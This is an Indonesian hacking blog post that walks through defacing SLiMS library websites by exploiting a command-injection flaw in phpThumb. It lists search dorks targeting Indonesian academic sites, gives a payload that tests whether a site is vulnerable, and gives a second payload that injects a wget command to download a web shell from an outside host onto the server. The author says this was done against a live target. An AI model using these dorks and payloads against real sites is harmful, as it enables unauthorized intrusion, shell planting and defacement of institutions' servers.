Deface Metode Slims Remote Code Execution (RCE)

skullxploit
Februari 13, 2021

 oghey geng kali ini di blog skullxploit. Akan kasih tutorial cara deface poc slims rce 

BahanBahan :

# Dork

inurl:/index.php?p=show_detail&id= site:ac.id
inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id
"Powered By SliMS7" cendana
inurl:"/index.php?select_lang=" site:.

[ pokokny kembangin sndiri pke otak wibu kelen :v ]

Payload untuk mengecek Vuln atau engga nya

lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;%20&phpThumbDebug=9

Payload Rce buat upload shell nya

lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/Anon-Exploiter/Mini-Shell/master/mini_shell.php;%20&phpThumbDebug=9


Step.1

dorking dulu ya pke dork yg di atas


Step.2

nah kebetulan w sudah ada live target nya


Step.3

langsung aja gw ksih payload yg buat tes Vuln atau engga ny


oke kalau gini kemungkinan Vuln ya :v

Step.4

Langsung saja gw ksih Payload rce nya buat upshell 


oke done berhasil ke upload sekian dari blog skullxploit